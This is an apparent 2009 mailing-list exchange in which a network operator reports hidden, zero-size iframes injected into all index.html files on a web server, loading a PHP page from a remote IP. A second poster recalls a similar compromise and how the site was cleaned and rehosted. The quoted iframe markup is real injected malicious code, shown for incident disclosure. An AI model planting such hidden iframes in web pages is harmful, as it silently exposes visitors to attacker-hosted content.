On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg <b...@wins.net> wrote: > We just discovered what we suspect is malicious code appended to all > index.html files on our web server as of the 11:00 central time hour today: > > src="http://77.92.158.122/webmail/inc/web/index.php" > style="display: none;" height="0" width="0"></iframe> > <iframe src="http://77.92.158.122/webmail/inc/web/index.php" > style="display: none;" height="0" width="0"></iframe> </body> </html> > > IP address resolves to mail.yaris.com; couldn't find any A/V site > references to this. > > Google search reveals some Chinese sites with references to the URL today, > but nothing substantial in the translation. > > Just a heads up for folks; we have a team investigating... > > Russell Berg > Dir - Product Development > Airstream Communications > b...@wins.net > 715-832-3726 > > I've run into this sort of attack before, where they change the page to load content from elsewhere; but I couldn't figure out how they managed to write to the sites' pages. They were hosted on a commercial webhost, and so if it was a compromised host (which seemed like the only possibility to me), that didn't speak well for the hosting company.
We were having issues with the company anyways, though; so I took down the site, sanitized the pages (and removed a bunch of junk), and put the site back up with another company. But if you figure out how they got write access to a static website, I'd love to hear it. -N.